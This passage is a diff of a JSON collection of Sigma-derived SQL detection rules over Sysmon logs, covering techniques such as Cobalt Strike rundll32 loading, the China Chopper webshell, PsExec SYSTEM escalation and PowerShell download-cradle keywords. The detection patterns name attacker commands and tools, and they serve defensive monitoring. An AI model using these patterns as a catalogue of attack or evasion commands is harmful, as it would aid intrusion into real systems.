Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_exploit_cve_2020_1350.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Remote CHM File Download/Execution Via HH.EXE", + "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", + "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious TSCON Start as SYSTEM", + "id": "9847f263-4a81-424f-970c-875dab15b79b", + "status": "experimental", + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_tscon_localsystem.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Potential CommandLine Path Traversal Via Cmd.EXE", + "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "status": "test", + "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Java tools are known to produce false-positive when loading libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_cmd_path_traversal.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", - "author": "Florian Roth (Nextron Systems)", + "title": "Chopper Webshell Process Pattern", + "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", + "status": "experimental", + "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", + "author": "Florian Roth (Nextron Systems), MSTI (query)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_webshell_chopper.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Reg Add Suspicious Paths", + "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "status": "experimental", + "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1112", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Rare legitimate add to registry via cli (to these locations)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmstp_execution_by_creation.yml" + "filename": "proc_creation_win_reg_susp_paths.yml" }, { - "title": "Potential MsiExec Masquerading", - "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "status": "test", - "description": "Detects the execution of msiexec.exe from an uncommon directory", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], + "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", + "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "status": "experimental", + "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 